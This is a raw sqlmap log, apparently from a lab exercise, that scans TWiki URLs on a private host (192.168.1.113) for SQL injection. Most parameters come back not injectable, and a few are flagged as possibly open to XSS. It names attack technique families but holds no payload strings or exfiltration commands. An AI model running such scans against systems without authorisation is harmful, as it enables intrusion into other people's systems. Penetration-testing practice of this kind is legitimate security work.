[18:29:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:29:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:29:46] [WARNING] GET parameter 't' is not injectable | |
[18:29:46] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 25: | |
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Topic *List[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:29:46] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Topic *List[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:29:46] [INFO] testing connection to the target URL | |
[18:29:46] [INFO] testing if the target URL is stable | |
[18:29:47] [INFO] target URL is stable | |
[18:29:47] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:29:47] [WARNING] URI parameter '#1*' does not appear dynamic | |
[18:29:47] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:29:47] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:29:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:29:47] [WARNING] reflective value(s) found and filtering out | |
[18:29:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:29:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:29:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:29:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:29:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:29:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:29:52] [INFO] testing 'MySQL inline queries' | |
[18:29:52] [INFO] testing 'PostgreSQL inline queries' | |
[18:29:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:29:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:29:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:29:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:29:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:29:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:29:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:29:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:29:56] [INFO] testing 'Oracle AND time-based blind' | |
[18:29:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:29:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:30:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:30:11] [WARNING] URI parameter '#1*' is not injectable | |
[18:30:11] [INFO] testing if URI parameter '#2*' is dynamic | |
[18:30:11] [WARNING] URI parameter '#2*' does not appear dynamic | |
[18:30:11] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable | |
[18:30:11] [INFO] testing for SQL injection on URI parameter '#2*' | |
[18:30:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:30:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:30:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:30:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:30:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:30:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:30:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:30:16] [INFO] testing 'MySQL inline queries' | |
[18:30:16] [INFO] testing 'PostgreSQL inline queries' | |
[18:30:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:30:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:30:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:30:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:30:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:30:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:30:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:30:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:30:20] [INFO] testing 'Oracle AND time-based blind' | |
[18:30:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:30:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:30:35] [INFO] target URL appears to be UNION injectable with 1 columns | |
[18:30:35] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') | |
[18:30:35] [WARNING] URI parameter '#2*' is not injectable | |
[18:30:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 26: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:30:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?skin=print' | |
[18:30:35] [INFO] testing connection to the target URL | |
[18:30:36] [INFO] testing if the target URL is stable | |
[18:30:36] [INFO] target URL is stable | |
[18:30:36] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:30:36] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:30:37] [INFO] GET parameter 'skin' is dynamic | |
[18:30:37] [INFO] heuristics detected web page charset 'ascii' | |
[18:30:37] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:30:37] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:30:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:30:37] [WARNING] reflective value(s) found and filtering out | |
[18:30:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:30:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:30:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:30:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:30:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:30:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:30:41] [INFO] testing 'MySQL inline queries' | |
[18:30:41] [INFO] testing 'PostgreSQL inline queries' | |
[18:30:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:30:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:30:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:30:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:30:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:30:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:30:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:30:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:30:45] [INFO] testing 'Oracle AND time-based blind' | |
[18:30:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:30:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:30:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:30:59] [WARNING] GET parameter 'skin' is not injectable | |
[18:30:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 27: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebTopicList?rev1=1.2&rev2=1.1 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:30:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebTopicList?rev1=1.2&rev2=1.1' | |
[18:30:59] [INFO] testing connection to the target URL | |
[18:30:59] [INFO] testing if the target URL is stable | |
[18:31:00] [INFO] target URL is stable | |
[18:31:00] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:31:00] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:31:00] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:31:00] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:31:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:31:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:31:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:31:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:31:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:31:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:31:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:31:05] [INFO] testing 'MySQL inline queries' | |
[18:31:05] [INFO] testing 'PostgreSQL inline queries' | |
[18:31:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:31:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:31:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:31:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:31:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:31:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:31:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:31:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:31:09] [INFO] testing 'Oracle AND time-based blind' | |
[18:31:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:31:10] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:31:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:31:26] [WARNING] GET parameter 'rev1' is not injectable | |
[18:31:26] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:31:26] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[18:31:26] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:31:27] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:31:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:31:28] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:31:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:31:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:31:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:31:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:31:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:31:31] [INFO] testing 'MySQL inline queries' | |
[18:31:31] [INFO] testing 'PostgreSQL inline queries' | |
[18:31:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:31:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:31:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:31:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:31:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:31:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:31:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:31:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:31:35] [INFO] testing 'Oracle AND time-based blind' | |
[18:31:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:31:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:31:50] [WARNING] GET parameter 'rev2' is not injectable | |
[18:31:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 28: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?rev=1.1 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:31:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?rev=1.1' | |
[18:31:50] [INFO] testing connection to the target URL | |
[18:31:50] [INFO] testing if the target URL is stable | |
[18:31:51] [INFO] target URL is stable | |
[18:31:51] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:31:51] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:31:51] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:31:51] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:31:51] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:31:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:31:51] [WARNING] reflective value(s) found and filtering out | |
[18:31:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:31:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:31:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:31:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:31:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:31:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:31:56] [INFO] testing 'MySQL inline queries' | |
[18:31:56] [INFO] testing 'PostgreSQL inline queries' | |
[18:31:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:31:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:31:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:31:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:31:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:31:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:31:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:32:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:32:00] [INFO] testing 'Oracle AND time-based blind' | |
[18:32:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:32:01] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:32:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:32:16] [WARNING] GET parameter 'rev' is not injectable | |
[18:32:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 29: | |
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebTopicList?template=oopsmore¶m1=1.2¶m2=1.2 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:32:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebTopicList?template=oopsmore¶m1=1.2¶m2=1.2' | |
[18:32:16] [INFO] testing connection to the target URL | |
[18:32:16] [INFO] testing if the target URL is stable | |
[18:32:17] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:32:17] [INFO] testing if GET parameter 'template' is dynamic | |
[18:32:17] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:32:17] [INFO] GET parameter 'template' is dynamic | |
[18:32:18] [INFO] heuristics detected web page charset 'ascii' | |
[18:32:18] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:32:18] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:32:18] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:32:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:32:18] [WARNING] reflective value(s) found and filtering out | |
[18:32:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:32:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:32:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:32:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:32:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:32:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:32:21] [INFO] testing 'MySQL inline queries' | |
[18:32:21] [INFO] testing 'PostgreSQL inline queries' | |
[18:32:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:32:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:32:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:32:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:32:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:32:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:32:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:32:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:32:24] [INFO] testing 'Oracle AND time-based blind' | |
[18:32:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:32:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:32:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:32:36] [WARNING] GET parameter 'template' is not injectable | |
[18:32:36] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:32:36] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:32:36] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:32:37] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:32:37] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:32:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:32:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:32:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:32:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:32:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:32:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:32:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:32:41] [INFO] testing 'MySQL inline queries' | |
[18:32:41] [INFO] testing 'PostgreSQL inline queries' | |
[18:32:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:32:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:32:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:32:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:32:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:32:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:32:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:32:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:32:45] [INFO] testing 'Oracle AND time-based blind' | |
[18:32:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:32:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:33:01] [WARNING] GET parameter 'param1' is not injectable | |
[18:33:01] [INFO] testing if GET parameter 'param2' is dynamic | |
[18:33:01] [WARNING] GET parameter 'param2' does not appear dynamic | |
[18:33:01] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[18:33:02] [INFO] testing for SQL injection on GET parameter 'param2' | |
[18:33:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:33:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:33:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:33:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:33:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:33:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:33:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:33:06] [INFO] testing 'MySQL inline queries' | |
[18:33:06] [INFO] testing 'PostgreSQL inline queries' | |
[18:33:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:33:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:33:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:33:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:33:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:33:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:33:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:33:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:33:10] [INFO] testing 'Oracle AND time-based blind' | |
[18:33:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:33:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:33:26] [WARNING] GET parameter 'param2' is not injectable | |
[18:33:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 30: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=\.* | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:33:26] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=\.*' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:33:26] [INFO] testing connection to the target URL | |
[18:33:28] [INFO] testing if the target URL is stable | |
[18:33:29] [INFO] target URL is stable | |
[18:33:29] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:33:29] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:33:29] [WARNING] URI parameter '#1*' does not appear dynamic | |
[18:33:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:33:29] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:33:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:33:29] [WARNING] reflective value(s) found and filtering out | |
[18:33:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:33:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:33:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:33:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:33:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:33:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:33:34] [INFO] testing 'MySQL inline queries' | |
[18:33:34] [INFO] testing 'PostgreSQL inline queries' | |
[18:33:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:33:35] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:33:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:33:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:33:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:33:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:33:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:33:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:33:39] [INFO] testing 'Oracle AND time-based blind' | |
[18:33:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:33:39] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:33:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:33:56] [WARNING] URI parameter '#1*' is not injectable | |
[18:33:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 31: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^a | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:33:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^a' | |
[18:33:56] [INFO] testing connection to the target URL | |
[18:33:56] [INFO] testing if the target URL is stable | |
[18:33:57] [INFO] target URL is stable | |
[18:33:57] [INFO] testing if GET parameter 'scope' is dynamic | |
[18:33:57] [INFO] confirming that GET parameter 'scope' is dynamic | |
[18:33:57] [INFO] GET parameter 'scope' is dynamic | |
[18:33:58] [WARNING] heuristic (basic) test shows that GET parameter 'scope' might not be injectable | |
[18:33:58] [INFO] testing for SQL injection on GET parameter 'scope' | |
[18:33:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:34:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:34:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:34:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:34:06] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:34:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:34:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:34:10] [INFO] testing 'MySQL inline queries' | |
[18:34:10] [INFO] testing 'PostgreSQL inline queries' | |
[18:34:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:34:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:34:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
